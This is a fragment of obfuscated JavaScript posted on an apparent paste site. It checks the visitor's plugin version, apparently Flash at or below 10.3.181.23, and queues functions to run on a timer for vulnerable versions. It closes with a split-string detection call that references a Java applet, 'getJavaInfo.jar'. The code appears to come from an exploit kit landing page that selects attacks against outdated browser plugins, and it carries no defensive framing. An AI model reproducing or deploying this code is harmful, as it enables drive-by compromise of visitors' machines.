  1855. if ((ver[0] == 10 && ver[1] == 3 && ver[2] == 181 && ver[3] <= 23) || (ver[0] == 10 &&
  1856. ver[1] == 3 && ver[2] < 181)){
  1857. ar["push"](f1);
  1858. }
  1859. var arcalli = 0;
  1860. var arcall = function (){
  1861. if (ar.length <= arcalli)return 123;
  1862. ss = setTimeout;
  1863. var res = ar[arcalli]();
  1864. arcalli++;
  1865. if (res && window.document){
  1866. ss(function (){
  1867. arcall()
  1868. }
  1869. , 5509);
  1870. }
  1871. else {
  1872. arcall();
  1873. }
  1874. }
  1875. ;
  1876. arcall();
  1877. }
  1878. $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../maintain/getJavaInfo.jar");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement